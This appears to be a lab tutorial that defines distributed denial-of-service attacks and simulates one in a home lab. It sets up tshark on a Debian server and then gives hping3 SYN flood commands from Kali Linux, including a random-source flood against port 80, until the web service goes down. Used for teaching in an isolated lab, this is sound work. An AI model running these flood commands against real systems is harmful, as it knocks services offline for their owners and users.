⚔ī¸Simulate DDOS Attack

Introduction

DDOS attack or Distributed Denial of Service is a cyber attack by continuously sending fake traffic to a system or server. As a result, the server cannot manage all traffic, causing it to go down.

Generally, these attacks target networks, online services, and websites, with the aim that the server cannot accommodate traffic so that the website goes down and cannot operate. Not only targeting certain individuals or companies, this attack can also target higher sectors such as the government sector.

In practice, in order to attack a server, DDOS will deploy a large number of hosts. However, the host deployed is fake, then the hackers will flood the server traffic with the fake host. So when the server is successfully flooded by hacker traffic, the impact will be that the server will be more difficult for hosts or real users to access.


Trying to Attack the Client With DDOS

Debian 10- Server

This time we change the Network Interfaces for Debian 10- Server to NAT or Bridge. This means he will get an Internet IP that is in the same segment as the Router, namely: 192.168.91.0/24

Install Package

TShark is a network protocol analyzer. It lets you capture data packets from a live network, or read packets from a previously saved capture file, either printing the decoded form of those packets to standard output or writing the packets to a file. TShark's native capture file format is the pcapng format, which is also the format used by Wireshark and various other tools.

Without any options set, TShark will work like tcpdump. It will use the pcap library to capture traffic from the first available network interface and display a summary line on the standard output for each packet received.

apt install tshark

*non super user be able capture paket ? no

Run tshark

tshark

KaliLinux

Attack With DDOS

*hping3 -S --flood -V -p 80 (IP Debian 10- Server)
hping3 -S --flood -V -p 80 192.168.91.130      
*hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source (IP Debian 10- Server)
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.91.130

Then we just wait until the Web Server Service from Debian 10- Server is down

Last updated